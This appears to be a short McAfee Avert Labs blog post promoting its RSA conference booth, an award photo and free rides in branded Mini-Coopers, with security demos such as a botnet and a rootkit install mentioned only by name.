That is McAfee’s CTO Christopher Bolin (in the middle) receiving the award from Under Secretary of Commerce Cresanti with McAfee’s Interim CEO Dale Fuller to the left.

Huliq has a nice writeup of it available here.

Yes the rumors are true. We have confirmed sightings of the highly anticipated but never duplicated McAfee Mini-Cooper!

Remember to stop by our RSA booth, check out the demos and get free rides in the McAfee Mini-Cooper!!!!

This marks the first year that Avert Labs has a direct presense at RSA. We will be running some very cool demos at the McAfee booth and answering questions about our research happenings. Some of the demos include password-stealing trojans, a botnet in action, and the coolest drive-by rootkit installation ever!!! Make sure you stop by booth 1730 and say “Sup Dawgs!”

We also know how hard it can be to try and catch a cab around the Moscone Center, so on Tuesday and Wednesday we will be offering free rides from RSA to any nearby location in San Francisco. Just look for the black Mini Coopers displaying the McAfee logo!